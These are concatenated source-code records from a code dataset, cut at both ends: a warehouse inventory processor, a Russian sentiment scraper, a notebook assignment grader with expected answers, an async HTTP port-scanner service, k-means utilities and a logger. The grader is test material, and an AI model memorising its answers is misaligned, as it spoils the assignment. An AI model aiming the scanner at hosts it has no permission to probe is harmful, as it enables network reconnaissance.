aisle_letter == '' and level == 1:\n aisle_letter = 'F'\n\n try:\n location_inst = Location.objects.get(warehouse_location=warehouse_location,\n area=area,\n aisle_letter=aisle_letter,\n aisle_num=aisle_num,\n column=column,\n level=level,\n )\n except Location.DoesNotExist:\n location_inst = make_location(warehouse_location=warehouse_location,\n area=area,\n aisle_letter=aisle_letter,\n aisle_num=aisle_num,\n column=column,\n level=level,\n )\n\n location_dict[location_code] = location_inst\n\n i = Items(rack_location=location_inst,\n data_date=data_date,\n **item_data\n )\n items_list.append(i)\n it = Items.objects.bulk_create(items_list, batch_size=2000)\n # db.reset_queries()\n print(datetime.datetime.now())\n return 0\n\ndef delete_all_rack_location():\n Location.objects.all().delete()\n\ndef reset_db(delete_rack = False):\n DataDate.objects.all().delete()\n\n Items.objects.all().delete()\n\n if delete_rack:\n delete_all_rack_location()\n # populate_rack_location()\n\ndef get_datadates(num_dates=0):\n dates = DataDate.objects.order_by('-date')\n if num_dates != 0:\n dates = dates[:num_dates]\n return dates\n\ndef get_info():\n # unknown_location = Location.objects.get(loc=\"Unknown\")\n start = time.time()\n datadate = DataDate.objects.all().order_by('-date')[0]\n # items_query = datadate.items_set.all()\n items_query = Items.objects.filter(data_date=datadate)\n\n count = 0\n item_count = 0\n for i in items_query:\n count += 1\n item_count += i.avail_quantity\n\n print(count)\n print(time.time() - start)\n return item_count\n\ndef get_data_map(location_map, data_type):\n return []\n\ndef get_item_count_map(loc, date_id, level):\n data_dic = {}\n data_date_inst = DataDate.objects.get(pk = date_id)\n\n i_q = Items.objects.filter(data_date=data_date_inst, rack_location__loc=loc)\n if level != \"All\":\n i_q = i_q.filter(rack_location__level=level)\n i_q = i_q.select_related('rack_location')\n\n for item_inst in i_q:\n js_loc_code = loc_inst_to_jsloccode(item_inst.rack_location)\n if js_loc_code not in data_dic:\n data_dic[js_loc_code] = {\"items\": {}, \"total\": 0}\n\n location = item_inst.location_code\n if location not in data_dic[js_loc_code][\"items\"]:\n data_dic[js_loc_code][\"items\"][location] = {}\n cur_item_dic = data_dic[js_loc_code][\"items\"][location]\n\n item_code = item_inst.item_code\n item_quantity = item_inst.avail_quantity + item_inst.ship_quantity\n data_dic[js_loc_code][\"total\"] += item_quantity\n\n if item_code not in cur_item_dic:\n cur_item_dic[item_code] = item_quantity\n else:\n cur_item_dic[item_code] += item_quantity\n\n return data_dic\n\ndef get_item_shipped_map(loc, date_1_id, date_2_id, level):\n \"\"\"\n Returns dictionary map of items_shipped\n :param loc: String letter\n :param date_1_id: Int of datadate ID\n :param date_2_id: Int of datadate ID\n :param level: Int ( or \"All\") of level to search\n :return: {\"items\": {[\"location code\"]: {item_sku[Int]: [Int # item shipped]} }, \"total\": 0}\n \"\"\"\n data_dic = {}\n\n datadate_1 = DataDate.objects.get(pk = date_1_id)\n datadate_2 = DataDate.objects.get(pk = date_2_id)\n d_1 = datadate_1.date\n d_2 = datadate_2.date\n\n # Check whether date_1 or date_2 is older.\n if d_1 == d_2:\n return {}\n if d_1 > d_2:\n newer_datadate = datadate_1\n older_datadate = datadate_2\n else:\n newer_datadate = datadate_2\n older_datadate = datadate_1\n\n item_query_older = Items.objects.filter(data_date=older_datadate, rack_location__loc=loc)\n item_query_newer = Items.objects.filter(data_date=newer_datadate, fifo_date__lte=older_datadate.date).select_related('rack_location')\n\n if level != \"All\":\n item_query_older = item_query_older.filter(rack_location__level=level)\n item_query_older = item_query_older.select_related('rack_location')\n\n labId_newerItem_dic = {}\n labId_olderItem_dic = {}\n labId_older_iteminst_dic = {}\n for item_1 in item_query_newer:\n lid = item_1.lab_id\n if lid in labId_newerItem_dic:\n labId_newerItem_dic[lid] += item_1.avail_quantity + item_1.ship_quantity\n else:\n labId_newerItem_dic[lid] = item_1.avail_quantity + item_1.ship_quantity\n for item_2 in item_query_older:\n lid = item_2.lab_id\n if lid in labId_olderItem_dic:\n labId_olderItem_dic[lid] += item_2.avail_quantity + item_2.ship_quantity\n else:\n labId_olderItem_dic[lid] = item_2.avail_quantity + item_2.ship_quantity\n # New items in excel are read first, so older items will replace older\n # ones in lab_id_loc_dic. Because older items should go first\n # (It's actually by RCV date).\n\n labId_older_iteminst_dic[lid] = item_2\n\n for lab_id in labId_olderItem_dic:\n item_inst = labId_older_iteminst_dic[lab_id]\n\n js_loc_code = loc_inst_to_jsloccode(item_inst.rack_location)\n\n item_code = item_inst.item_code\n item_quantity = labId_olderItem_dic[lab_id]\n\n if lab_id in labId_newerItem_dic:\n difference = item_quantity - labId_newerItem_dic[lab_id]\n else:\n difference = item_quantity\n if difference == 0:\n continue\n elif difference < 0:\n item_q = Items.objects.filter(data_date=older_datadate, lab_id=lab_id)\n total = 0\n for i in item_q:\n total += i.avail_quantity + i.ship_quantity\n difference = total - labId_newerItem_dic[lab_id]\n if difference == 0:\n continue\n\n if js_loc_code not in data_dic:\n data_dic[js_loc_code] = {\"items\": {}, \"total\": 0}\n\n location = item_inst.location_code\n if location not in data_dic[js_loc_code][\"items\"]:\n data_dic[js_loc_code][\"items\"][location] = {}\n cur_item_dic = data_dic[js_loc_code][\"items\"][location]\n\n data_dic[js_loc_code][\"total\"] += difference\n\n if item_code not in cur_item_dic:\n cur_item_dic[item_code] = difference\n else:\n cur_item_dic[item_code] += difference\n\n return data_dic\n\ndef get_item_added_map(loc, date_1_id, time_period, level):\n data_dic = {}\n\n datadate = DataDate.objects.get(pk=date_1_id)\n submitted_date = datadate.date\n\n t_delta = datetime.timedelta(days=int(time_period))\n\n prev_date = submitted_date - t_delta\n\n # iv_create_date is usually the the newest date, with it being sometimes nearly the same\n # as fifo_date.\n item_query = Items.objects.filter(data_date=datadate, rack_location__loc=loc, iv_create_date__gte=prev_date)\n\n if level != \"All\":\n item_query = item_query.filter(rack_location__level=level)\n item_query = item_query.select_related('rack_location')\n\n for item in item_query:\n if item.get_input_date() < prev_date:\n continue\n\n js_loc_code = loc_inst_to_jsloccode(item.rack_location)\n\n item_code = item.item_code\n item_quantity = item.avail_quantity + item.ship_quantity\n\n if js_loc_code not in data_dic:\n data_dic[js_loc_code] = {\"items\": {}, \"total\": 0}\n\n location = item.location_code\n if location not in data_dic[js_loc_code][\"items\"]:\n data_dic[js_loc_code][\"items\"][location] = {}\n cur_item_dic = data_dic[js_loc_code][\"items\"][location]\n\n data_dic[js_loc_code][\"total\"] += item_quantity\n\n if item_code not in cur_item_dic:\n cur_item_dic[item_code] = item_quantity\n else:\n cur_item_dic[item_code] += item_quantity\n\n return data_dic\n\ndef loc_inst_to_jsloccode(loc_inst):\n # Returns the loc_code used in js component\n # (Location code, without the level implemented).\n warehouse_code = \"USLA\"\n area_code = \"\"\n aisle_code = str(loc_inst.aisle_num)\n column_code = str(loc_inst.column)\n\n loc = loc_inst.loc\n area = loc_inst.area\n aisle_letter = loc_inst.aisle_letter\n if loc == \"P\":\n area_code = \"P\"\n elif loc == \"S\":\n if area == \"H\" and aisle_letter == \"H\" or area == \"S\":\n area_code = \"S\"\n else:\n area_code = \"H\"\n elif loc == \"VC\":\n if area == \"VC\" or area == \"VD\":\n area_code = \"VC\"\n elif area == \"VA\" or area == \"VB\":\n area_code = \"VA\"\n else:\n area_code = \"H\"\n else:\n if area == \"F\":\n area_code = \"F\"\n else:\n area_code = \"VA\"\n return warehouse_code + \".\" + area_code + \".\" + aisle_code + \".\" + column_code\n\ndef delete_by_date(date_id):\n data_date = DataDate.objects.get(id=date_id)\n data_date.delete()\n # It cascades to Items by foreign key association\n return data_date","sub_path":"warehouse_data/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":14147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"308209548","text":"import sys\nimport requests\nfrom bs4 import BeautifulSoup\nfrom polyglot.text import Text\n\n#Run once\n#import nltk\n#nltk.download('stopwords')\n\nfrom nltk.corpus import stopwords #to get russian stopwords\nfrom pymystem3 import Mystem #for lemmatization\nfrom string import punctuation\n\n''' \nSource of the solution to tokenize:\nhttps://www.kaggle.com/alxmamaev/how-to-easy-preprocess-russian-text\n'''\n\n#Create lemmatizer and stopwords list\nmystem = Mystem() \nrussian_stopwords = stopwords.words(\"russian\")\n\n#Preprocess function\ndef preprocess_text(text):\n tokens = mystem.lemmatize(text.lower())\n tokens = [token for token in tokens if token not in russian_stopwords\\\n and token != \" \" \\\n and token.strip() not in punctuation]\n \n text = \" \".join(tokens)\n \n return text\n\n# Get the data by URL\nurl = sys.argv[1]\npage = requests.get(url)\n\n#Check received data\nif page.status_code != 200:\n\traise NameError('Unexpected status code is received')\nelse:\n\tsoup = BeautifulSoup(page.text, 'html.parser')\n\ntitle = soup.find(\"title\")\nlines = soup.find_all(\"p\")\nbody = '\\n'.join([line.text.strip() for line in lines])\n\ntext = Text(preprocess_text(body))\n\nvsum = 0\nfor w in text.words:\n vsum = vsum + w.polarity\n\nprint('Сумма полярностей: '+str(vsum))\n\nif vsum >= 0:\n print(\"Статью можно считать позитивной!\")\nelse:\n print(\"Статью можно считать негативной!\")\n\n# Если нужно посмотреть таблицу Слово-Полярность\n'''\nprint(\"{:<16}{}\".format(\"Word\", \"Polarity\")+\"\\n\"+\"-\"*30)\nfor w in text.words:\n print(\"{:<16}{:>2}\".format(w, w.polarity))\n'''","sub_path":"webscraper.py","file_name":"webscraper.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"174435743","text":"import os\nimport numpy as np\n\nprint('\\n======================= Code Execution =======================\\n')\n\nif False:\n runningInNotebook = False\n print('========================RUNNING INSTRUCTOR''S SOLUTION!')\n import A1mysolution as useThisCode\n train = useThisCode.train\n trainSGD = useThisCode.trainSGD\n use = useThisCode.use\n rmse = useThisCode.rmse\n\nelse:\n print('Extracting python code from notebook and storing in notebookcode.py')\n import subprocess\n with open('notebookcode.py', 'w') as outputFile:\n subprocess.call(['jupyter', 'nbconvert', '--to', 'script',\n '*-A1.ipynb', '--stdout'], stdout=outputFile)\n # from https://stackoverflow.com/questions/30133278/import-only-functions-from-a-python-file\n import sys\n import ast\n import types\n with open('notebookcode.py') as fp:\n tree = ast.parse(fp.read(), 'eval')\n print('Removing all statements that are not function or class defs or import statements.')\n for node in tree.body[:]:\n if (not isinstance(node, ast.FunctionDef) and\n not isinstance(node, ast.ClassDef) and\n not isinstance(node, ast.Import) and\n not isinstance(node, ast.ImportFrom)):\n tree.body.remove(node)\n # Now write remaining code to py file and import it\n module = types.ModuleType('notebookcodeStripped')\n code = compile(tree, 'notebookcodeStripped.py', 'exec')\n sys.modules['notebookcodeStripped'] = module\n exec(code, module.__dict__)\n # import notebookcodeStripped as useThisCode\n from notebookcodeStripped import *\n\ndef close(a, b, within=0.01):\n return abs(a-b) < within\n\ng = 0\n\nA = np.array([[1,2,3], [4,5,6]])\nB = A + 1\nprint('Testing rmse(A, B) with\\n A =\\n{}\\n and B =\\n{}'.format(A, B))\n\ntry:\n answer = rmse(A, B)\n correctAnswer = 1\n if close(answer, correctAnswer):\n g += 10\n print('\\n--- 10/10 points. Correctly returned {}'.format(answer))\n else:\n print('\\n--- 0/10 points. Incorrect. You returned {}, but correct answer is {}'.format(answer, correctAnswer))\nexcept Exception as ex:\n print('\\n--- 0/10 points. rmse raised the exception\\n {}'.format(ex))\n\n\nX = np.arange(15).reshape((5,3))\nX[3:5, :] *= 2\nT = X[:,0:2] + 0.1 * X[:,1:2] * X[:,2:3]\n\nprint('\\nTesting model = train(X, T) with\\n X=\\n{}\\n and T=\\n{}'.format(X, T))\ntry:\n model = train(X, T)\n if 'means' in model.keys():\n g += 5\n print('\\n--- 5/5 points. Model correctly includes a key named \\'means\\'.')\n else:\n print('\\n--- 0/5 points. Model does not include a key named \\'means\\'.')\n \n if 'stds' in model.keys():\n g += 5\n print('\\n--- 5/5 points. Model correctly includes a key named \\'stds\\'.')\n else:\n print('\\n--- 0/5 points. Model does not include a key named \\'stds\\'.')\n \n if 'w' in model.keys():\n g += 5\n print('\\n--- 5/5 points. Model correctly includes a key named \\'w\\'.')\n else:\n print('\\n--- 0/5 points. Model does not include a key named \\'w\\'.')\n\nexcept Exception as ex:\n print('\\n--- 0/15 points. train raised the exception\\n {}'.format(ex))\n\nprint('\\nTesting rmse(T, use(model, X))')\ntry:\n answer = rmse(T, use(model, X))\n correctAnswer = 5.24\n if close(answer, correctAnswer, 0.2):\n g += 15\n print('\\n--- 15/15 points. Error is correctly calculated as {}.'.format(answer))\n else:\n print('\\n--- 0/15 points. Error of {} is wrong. It should be {}.'.format(answer, correctAnswer))\n\nexcept Exception as ex:\n print('\\n--- 0/15 points. rmse or use raised the exception\\n {}'.format(ex))\n\n\n\nprint('\\nTesting model = trainSGD(X, T, 0.01, 1000) with\\n X=\\n{}\\n and T=\\n{}'.format(X, T))\ntry:\n model = trainSGD(X, T, 0.01, 1000)\n if 'means' in model.keys():\n g += 5\n print('\\n--- 5/5 points. Model correctly includes a key named \\'means\\'.')\n else:\n print('\\n--- 0/5 points. Model does not include a key named \\'means\\'.')\n \n if 'stds' in model.keys():\n g += 5\n print('\\n--- 5/5 points. Model correctly includes a key named \\'stds\\'.')\n else:\n print('\\n--- 0/5 points. Model does not include a key named \\'stds\\'.')\n \n if 'w' in model.keys():\n g += 5\n print('\\n--- 5/5 points. Model correctly includes a key named \\'w\\'.')\n else:\n print('\\n--- 0/5 points. Model does not include a key named \\'w\\'.')\n\nexcept Exception as ex:\n print('\\n--- 0/15 points. trainSGD raised the exception\\n {}'.format(ex))\n\nprint('\\nTesting rmse(T, use(model, X))')\ntry:\n answer = rmse(T, use(model, X))\n correctAnswer = 5.24\n if close(answer, correctAnswer):\n g += 15\n print('\\n--- 15/15 points. Error is correctly calculated as {}.'.format(answer))\n else:\n print('\\n--- 0/15 points. Error of {} is wrong. It should be {}.'.format(answer, correctAnswer))\n\nexcept Exception as ex:\n print('\\n--- 0/15 points. rmse or use raised the exception\\n {}'.format(ex))\n\n\nname = os.getcwd().split('/')[-1]\n\nprint('\\n{} Execution Grade is {}/70'.format(name, g))\n\nprint('\\n======================= Plots and Descriptions =======================')\n\nprint('\\n--- _/5 points. Descriptions of data, including plots.')\n\nprint('\\n--- _/5 points. Descriptions of algorithms for fitting linear model.')\n\nprint('\\n--- _/5 points. Descriptions of code for all defined functions.')\n\nprint('\\n--- _/5 points. Plots of predictions made by models from train and trainSGD. Must at least include predicted values versus actual values for each target variable and for each model.')\n\nprint('\\n--- _/5 points. Discussions of the above plots of predictions and actual values.')\n\nprint('\\n--- _/5 points. Discussion of accuracy of each model. Refer to RMSE values and what they mean with respect to the range of target values.')\n\n\n\nprint('\\n{} Notebook Grade is __/30'.format(name))\n\nprint('\\n{} FINAL GRADE is __/100'.format(name))\n\n\n\n","sub_path":"A1/A1grader.py","file_name":"A1grader.py","file_ext":"py","file_size_in_byte":5969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"394831568","text":"#!/usr/bin/python3\nimport asyncio\nimport socket\nimport logging\nimport aiodns\nimport resource\nfrom aiohttp import web\nfrom logging.handlers import SysLogHandler\nfrom request_checkers import (is_valid_tcp_upd_port,\n is_valid_ipv4_address,\n is_valid_ipv6_address)\n\n\nasync def handle_error(msg):\n logging.error('port_scanner_srv: ' + msg)\n raise web.HTTPBadRequest(reason=msg)\n\n\nasync def scan_port(event_loop, address, port):\n connect = asyncio.open_connection(address, port, loop=event_loop)\n try:\n await asyncio.wait_for(connect, timeout=10, loop=event_loop)\n except (asyncio.TimeoutError, ConnectionRefusedError):\n result = '{\"port\": ' + str(port) + ', \"state\": \"close\"}'\n except socket.error as msg:\n await handle_error('socket.error ' + str(msg))\n else:\n result = '{\"port\": ' + str(port) + ', \"state\": \"open\"}'\n finally:\n connect.close()\n return result\n\n\nasync def check_ports(start_port, end_port):\n if not start_port.isdecimal() or not end_port.isdecimal():\n await handle_error('The start port or end port is not a number.')\n start_port, end_port = int(start_port), int(end_port)\n if not is_valid_tcp_upd_port(start_port):\n await handle_error('The start port is out of range.')\n if not is_valid_tcp_upd_port(end_port):\n await handle_error('The end port is out of range.')\n if start_port > end_port:\n await handle_error('The start port is larger than the end port.')\n\n\nasync def resolve_and_check_address(event_loop, address):\n if is_valid_ipv4_address(address) or is_valid_ipv6_address(address):\n return address\n resolver = aiodns.DNSResolver(loop=event_loop)\n try:\n resolved_result = await resolver.gethostbyname(address, socket.AF_INET)\n except aiodns.error.DNSError as msg:\n await handle_error('The address or hostname is wrong. ' + str(msg))\n else:\n return resolved_result.addresses[0]\n\n\nasync def increase_open_file_limit():\n max_ports_x3 = (65535 + 1) * 3\n soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)\n if max_ports_x3 > soft:\n if max_ports_x3 * 3 < hard:\n resource.setrlimit(resource.RLIMIT_NOFILE, (max_ports_x3, hard))\n\n\nasync def get_handler(request):\n event_loop = asyncio.get_event_loop()\n # Debug environment\n # event_loop.set_debug(True)\n # End debug environment\n address = await resolve_and_check_address(event_loop,\n request.match_info.get('address'))\n start_port = request.match_info.get('start_port')\n end_port = request.match_info.get('end_port')\n await check_ports(start_port, end_port)\n await increase_open_file_limit()\n response = web.StreamResponse()\n response.enable_chunked_encoding()\n response.headers['Content-Type'] = 'application/json'\n futures = [scan_port(event_loop, address, port)\n for port in range(int(start_port), int(end_port) + 1)]\n first_element = True\n for future in asyncio.as_completed(futures):\n result = await future\n if first_element:\n await response.prepare(request)\n await response.write(bytes('[' + result, encoding='utf8'))\n first_element = False\n else:\n await response.write(bytes(',' + result, encoding='utf8'))\n await response.write(bytes(']', encoding='utf-8'))\n await response.write_eof()\n return response\n\ndef main():\n app = web.Application()\n app.router.add_get('/{address}/{start_port}/{end_port}', get_handler)\n # Debug environment\n # logging.basicConfig(level=logging.DEBUG)\n # End debug environment\n logging.basicConfig(level=logging.INFO, handlers=[SysLogHandler(address='/dev/log'), SysLogHandler()])\n logging.info('port_scanner_srv: start')\n web.run_app(app, access_log_format='port_scanner_srv: %a %t \"%r\" %s %b'\n ' \"%{Referer}i\" \"%{User-Agent}i\"')\n logging.info('port_scanner_srv: stop')\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ideco/task2/port_scanner_srv.py","file_name":"port_scanner_srv.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"435166545","text":"\"\"\"\n\n124. Binary Tree Maximum Path Sum\n\nGiven a non-empty binary tree, find the maximum path sum.\n\nFor this problem, a path is defined as any sequence of nodes from some starting node to any node in the tree along\nthe parent-child connections. The path must contain at least one node and does not need to go through the root.\n\nExample 1:\n\nInput: [1,2,3]\n\n 1\n / \\\n 2 3\n\nOutput: 6\nExample 2:\n\nInput: [-10,9,20,null,null,15,7]\n\n -10\n / \\\n 9 20\n / \\\n 15 7\n\nOutput: 42\n\n\n\"\"\"\n\nfrom Algo.utilities.tree import *\n\n\nclass Solution:\n def maxPathSum(self, root: TreeNode) -> int:\n self.maxi = root.val\n\n def dfs(node):\n if node is None:\n return 0\n l = dfs(node.left)\n r = dfs(node.right)\n m = max(l, 0) + node.val + max(r, 0)\n self.maxi = max(m, self.maxi)\n ret = max(node.val + l, node.val + r, node.val)\n return ret\n dfs(root)\n return self.maxi\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n method = sol.maxPathSum\n\n tree1 = deserialize('[1,2,3]')\n tree2 = deserialize('[-10,9,20,null,null,15,7]')\n tree3 = deserialize('[-2,null,-3]')\n tree4 = deserialize('[1,-2,-3,1,3,-2,null,-1]')\n tree5 = deserialize('[5,4,8,11,null,13,4,7,2,null,null,null,1]')\n tree6 = deserialize('[-2,-1,-3]')\n\n cases = [\n (method, (tree1, ), 6),\n (method, (tree2, ), 42),\n (method, (tree3, ), -2),\n (method, (tree4, ), 3),\n (method, (tree5, ), 48),\n (method, (tree6, ), -1),\n ]\n\n for i, (func, case, expected) in enumerate(cases):\n ans = func(*case)\n if ans == expected:\n print(\"Case {:d} Passed\".format(i + 1))\n else:\n print(\"Case {:d} Failed; Expected {:s} != {:s}\".format(i + 1, str(expected), str(ans)))","sub_path":"algo/tree/binary_tree_maximum_path_sum.py","file_name":"binary_tree_maximum_path_sum.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"47383310","text":"\r\ndef init_global():\r\n\tglobal error\r\n\tglobal no_blocks\r\n\tglobal blocks\r\n\tglobal condition_symbols\r\n\tglobal output_list\r\n\tglobal output_to_file\r\n\tglobal block_output\r\n\r\n\tno_blocks = 0\r\n\terror = 0\r\n\tblocks = {}\r\n\tcondition_symbols = [\"==\", \"<=\", \"<\", \">=\", \">\", \"!=\", \"&&\", \"||\", \"-\", \"+\", \"/\", \"*\"]\r\n\toutput_to_file = \"\"\r\n\tblock_output = \"\"\r\n\r\n","sub_path":"Submission3/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"314036902","text":"\"\"\"\nThis python file implements the following function:\nimplements kmeans clustering utils for the project\nnormal(): Apply z-score normalization to three features in 'product_features.csv'\ndis(): calculate Euclidean distance between two vectors\nrandCent(): create k center randomly\nkMeans(): Apply K-means clustering to all products(1000) based on 'attribute1','attribute2' and 'original price'\nclu_plot(): Plot the clustering result\nsave_cate_data(): save data into different category folders based on the clustering result\nclustering(): combine the above functions and form an executable function\n\"\"\"\nimport numpy as np\nimport pandas as pd\nfrom math import *\nimport random\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom set_path import save_path\n\nc_num = 3 # number of classes\n\n\ndef normal(d_in):\n \"\"\"\n this function implements the following function:\n normalization process for different attributes (z-score)\n :param d_in: input data [[x11,x12,...],...,[xn1,xn2,...]]\n :return:d_out: normalized data\n \"\"\"\n d_out = np.empty(shape=(d_in.shape[0], 0))\n for i in range(d_in.shape[1]):\n temp = np.reshape(d_in[:, i], (-1, 1))\n mean = np.mean(temp)\n std = np.std(temp)\n temp = (temp - mean) / std\n d_out = np.hstack((d_out, temp))\n return d_out\n\n\ndef dist(A, B, w):\n \"\"\"\n this function implements the following function:\n calculate euclidean distance between A and B\n :param A: vector A\n :param B: vector B\n :param w: weight vector\n :return: dis (float)\n \"\"\"\n return np.sqrt(sum(np.power(w * (A - B), 2)))\n\n\ndef randCent(d_in, k):\n \"\"\"\n this function implements the following function:\n create k center randomly\n :param d_in: input data\n :param k: clustering number\n :return: centroids [[c11,...,c1n],...,[ck1,...,ckn]]\n \"\"\"\n d_in = np.array(d_in, dtype=np.float)\n centroids = np.empty(shape=(0, d_in.shape[1]), dtype=np.float)\n record = np.array([])\n for i in range(k):\n flag = True\n while flag:\n index = random.randint(0, d_in.shape[0] - 1)\n flag = bool(np.size(np.where(record == index)) != 0) # random point already exists?\n record = np.hstack((record, index))\n centroids = np.vstack((centroids, d_in[index]))\n return centroids\n\n\ndef kMeans(d_in, w, k):\n \"\"\"\n this function implements the following function:\n K-means clustering algorithm\n :param d_in: input data [[x1,y1,...],[x2,y2,...],....,[xn,yn,...]]\n :param k: clustering number\n :return: centroids[[class 1, pos 2],[class 2, pos 2]...], result[[point 1, dis 1], [point2, dis2],...]\n \"\"\"\n m = np.shape(d_in)[0]\n result = np.zeros((m, 2)) # store the clustering result [[class1,dis1],...,[classn,disn]]\n centroids = randCent(d_in, k) # generate random centers for different classes\n flag = True # to judge whether the clustering process has converged\n count = 1\n while flag:\n flag = False\n print('\\t' + 'iteration: %s' % count)\n for i in range(m): # assign points to their nearest class\n min_dist = inf\n min_ind = -1\n for j in range(k):\n distJI = dist(centroids[j, :], d_in[i, :], w)\n if distJI < min_dist:\n min_dist = distJI\n min_ind = j\n if result[i, 0] != min_ind:\n flag = True # if change exists, continue iteration process\n result[i, :] = min_ind, min_dist ** 2\n for cent in range(k): # recalculate center points for different classes\n ptsInClust = d_in[np.nonzero(result[:, 0] == cent)[0]]\n centroids[cent, :] = np.mean(ptsInClust, axis=0)\n count = count + 1\n return centroids, result\n\n\ndef clu_plot(cate, cor):\n \"\"\"\n this function implements the following function:\n save the clustering result figure as 'figure/clustering_result.png'\n :param cate:\n :param cor:\n :return:\n \"\"\"\n fig = plt.figure()\n ax = Axes3D(fig)\n ax.scatter(cor[:, 0], cor[:, 1], cor[:, 2], c=cate)\n ax.set_zlabel('original price', fontdict={'size': 15, 'color': 'red'})\n ax.set_ylabel('attribute 2', fontdict={'size': 15, 'color': 'red'})\n ax.set_xlabel('attribute 1', fontdict={'size': 15, 'color': 'red'})\n plt.show()\n plt.savefig('figure/clustering_result.png')\n\n\ndef kmeans_clustering(d_in, type='Unweighted', num=c_num, save=True):\n \"\"\"\n this function implements the following function:\n combine the above functions and form an executable function\n :return: None\n \"\"\"\n data = np.array(d_in)[:, 1:]\n if type == 'Weighted': # 有权聚类\n weight = np.array(d_in.columns.values[1:]).astype(float)\n elif type == 'Unweighted': # 无权聚类\n weight = np.ones((1, data.shape[1])).reshape(-1)\n else:\n raise TypeError('Unrecognized clustering type')\n nor_fea = normal(data) # normalize feature value\n myCentroids, result = kMeans(nor_fea, weight, num)\n d_out = np.hstack((np.zeros((np.array(d_in).shape[0], 1)), np.array(d_in)))\n d_out = np.vstack((np.zeros((1, d_out.shape[1])), d_out))\n d_out[0, 0] = 'Cate'\n d_out[0, 1:] = d_in.columns.values\n d_out[1:, 0] = result[:, 0]\n if save:\n # np.savetxt(save_path + 'classifier/KMeans_result.csv', d_out, fmt='%s', delimiter=',')\n pd.DataFrame(d_out).to_csv(save_path + 'classifier/KMeans_result.csv', header=0, index=0)\n print(\"result saved in \" + save_path + 'classifier/KMeans_result.csv')\n return myCentroids, result\n\n\ndef best_k(d_in):\n record = inf\n bestk = 0\n weight = np.array(d_in.columns.values[1:]).astype(float)\n for k in range(2, 7):\n c, r = kmeans_clustering(d_in, save=False, num=k) # 在k个类别下进行聚类\n sum = 0\n for i in range(k):\n for j in range(i, k):\n sum = sum + dist(c[i, :], c[j, :], weight)\n r_out = 2 * sum / (k * (k - 1)) # 类间距离(希望max)\n r_in = np.sum(np.sqrt(r[:, :])) # 类内距离(希望min)\n judge = r_in / r_out\n if record > judge:\n record = judge\n bestk = k\n print('dis for k=%d is %f, ' % (k, judge) + 'best dis is %f, ' % record + 'best k is %d' % bestk)\n print('best k in interval [2,7] is %d' % bestk)\n return bestk\n","sub_path":"Classifier/kmeans_utils.py","file_name":"kmeans_utils.py","file_ext":"py","file_size_in_byte":6379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"568492101","text":"import os\nimport sys\nimport logging\nimport logging.handlers\nimport logging.config\nfrom .Connection import Connection\nfrom .CreatLogName import log_name\n\n\nclass Logger(object):\n def __init__(self,\n set_level=\"INFO\",\n config_file_path=\"../PyFramework/LogCenter/config.ini\"):\n \"\"\"\n :param set_level: 日志级别[\"NOTSET\"|\"DEBUG\"|\"INFO\"|\"WARNING\"|\"ERROR\"|\"CRITICAL\"],默认为INFO\n \"\"\"\n \"\"\"关联配置文件和获得配置信息\"\"\"\n cfp = Connection(config_file_path)\n name = os.path.split(os.path.splitext(sys.argv[0])[0])[-1] # 程序项目名\n formatter = cfp.get_info(\"log\", \"log_format\") # 格式,不包括msg且不能包含被调用位置文件名/函数名/行数\n log_file_path = cfp.get_info(\"log\", \"log_path\") # 获取输出日志文件地址\n use_console = int(cfp.get_info(\"log\", \"log_use_console\")) # 获取是否获得控制台信息\n use_http = int(cfp.get_info(\"handler\", \"http_use\")) # 是否使用http发送\n log_file_name = log_name.check_new(config_file_path) # 本次输出的日志文件名\n\n if not set_level:\n set_level = self._exec_type() # 设置set_level为None,自动获取当前运行模式\n self.__logger = logging.getLogger(name)\n self.setLevel(\n getattr(logging, set_level.upper()) if hasattr(logging, set_level.upper()) else logging.INFO) # 设置日志级别\n if not os.path.exists(log_file_path): # 创建日志目录\n os.makedirs(log_file_path)\n formatter = logging.Formatter(formatter)\n handler_list = list()\n handler_list.append(logging.FileHandler(os.path.join(log_file_path, log_file_name), encoding=\"utf-8\"))\n if use_console: # 是否使用控制台\n handler_list.append(logging.StreamHandler())\n if use_http: # 是否使用http发送\n handler_list.append(\n logging.handlers.HTTPHandler(\n cfp.get_info(\"handler\", \"http_handler_host\"),\n cfp.get_info(\"handler\", \"http_handler_url\"),\n method=cfp.get_info(\"handler\", \"http_handler_method\"),\n secure=cfp.get_info(\"handler\", \"http_handler_secure\"),\n credentials=(cfp.get_info(\"handler\", \"http_handler_credentials_fir\"),\n cfp.get_info(\"handler\", \"http_handler_credentials_sec\")),\n context=cfp.get_info(\"handler\", \"http_handler_context\"))\n )\n for handler in handler_list:\n handler.setFormatter(formatter)\n self.addHandler(handler)\n self.handler_list = handler_list\n self.formatter = formatter\n\n def __del__(self):\n \"\"\"使用过后清楚handler,避免重复声明\"\"\"\n for handler in self.handler_list:\n handler.setFormatter(self.formatter)\n self.__logger.removeHandler(handler)\n\n def __getattr__(self, item):\n return getattr(self.logger, item)\n\n @property\n def logger(self):\n return self.__logger\n\n @logger.setter\n def logger(self, func):\n self.__logger = func\n\n @staticmethod\n def _exec_type():\n return \"DEBUG\" if os.environ.get(\"IPYTHONENABLE\") else \"INFO\"\n\n @staticmethod\n def gettype(level_value, msg):\n \"\"\"\n 用于获取该日志消息类型\n 在原有的[\"NOTSET\"|\"DEBUG\"|\"INFO\"|\"WARNING\"|\"ERROR\"|\"CRITICAL\"]基础上新添加不同的类型\n 0 : 